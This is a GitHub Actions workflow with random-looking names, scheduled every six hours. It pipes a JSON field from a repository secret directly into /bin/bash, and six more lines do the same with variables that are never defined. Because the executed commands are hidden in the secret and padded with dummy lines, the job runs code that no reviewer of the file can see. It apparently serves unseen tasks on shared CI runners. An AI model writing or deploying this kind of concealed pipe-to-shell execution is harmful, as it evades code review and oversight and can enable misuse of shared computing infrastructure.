name: huchunyan3456

on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huchunyan3456
        env:
          gg939: ${{ secrets.gg939 }}
        run: |
          echo $gg939 | jq -r .x4908 | /bin/bash
          echo $x01071 | jq -r .vel06 | /bin/bash
          echo $qbkq6696 | jq -r .qgrjb909 | /bin/bash
          echo $tkdul24593 | jq -r .my76768 | /bin/bash
          echo $bbb6733 | jq -r .pkmki371 | /bin/bash
          echo $o39315 | jq -r .pyg82712 | /bin/bash
          echo $vvphi9 | jq -r .hokdt0548 | /bin/bash

